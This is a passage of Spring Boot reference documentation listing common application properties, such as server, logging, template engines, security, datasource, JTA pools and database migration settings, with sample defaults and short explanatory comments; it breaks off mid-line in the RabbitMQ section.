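For example (the value shown here is purely illustrative), a property from the listing below can be set in `application.properties`:\n\n[source,properties,indent=0]\n----\n\tserver.port=9090\n----\n\nThe same property can equally be supplied as a command line switch, e.g. `--server.port=9090`.\n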
\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# BANNER\n\tbanner.charset=UTF-8 # banner file encoding\n\tbanner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (defaults to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma-separated list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma-separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\tlogging.pattern.console= # appender pattern for output to the console (only supported with the default logback setup)\n\tlogging.pattern.file= # appender pattern for output to the file (only supported with the default logback setup)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.excluded-user-agents= # list of user-agents to exclude from compression\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. 
server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.persistent=false # true if session should be saved across restarts\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\", \"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30 # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads=0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding=UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n\tserver.undertow.buffers-per-region= # number of buffers per region\n\tserver.undertow.direct-buffers=false # allocate buffers outside the Java heap\n\tserver.undertow.io-threads= # number of I\/O threads to create for the worker\n\t
server.undertow.worker-threads= # number of worker threads\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the content of the \"default\" model should be ignored during redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n
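\t# For example (illustrative values, not defaults), JSP views under \/WEB-INF\/jsp\/ would be\n\t# resolved by setting:\n\t# spring.mvc.view.prefix=\/WEB-INF\/jsp\/\n\t# spring.mvc.view.suffix=.jsp\n\n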
\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least a strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g. CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.locale= # locale used for formatting\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\tspring.jackson.time-zone= # Time zone used when formatting dates. Configured using any recognized time zone identifier, for example \"America\/Los_Angeles\" or \"GMT+10\"\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\tspring.thymeleaf.template-resolver-order= # order of the template resolver in the chain\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n\tspring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES 
({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example \"\/WEB-INF\/toolbox.xml\"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=text\/html\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties])\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n\tsecurity.oauth2.client.client-secret= # OAuth2 client secret. 
A random secret is generated by default\n\n\t# SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties])\n\tsecurity.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n\tsecurity.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if the datasource can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27017)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n
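\t# The host, port and credentials can also be embedded in the connection URI, e.g.\n\t# (illustrative values): spring.data.mongodb.uri=mongodb:\/\/user:secret@mongo1.example.com:12345\/test\n\n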
\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProperties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.version=2.6.10 # version of Mongo to use\n\tspring.mongodb.embedded.features=SYNC_DELAY # comma-separated list of features to enable\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming strategy class name\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating a session\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 
0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not producers and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 
0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 
0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migration scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version=1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n
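\t# With the prefix\/suffix defaults above, a migration script in db\/migration would be\n\t# named e.g. V1__init.sql (illustrative name)\n\n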
\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check that the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # 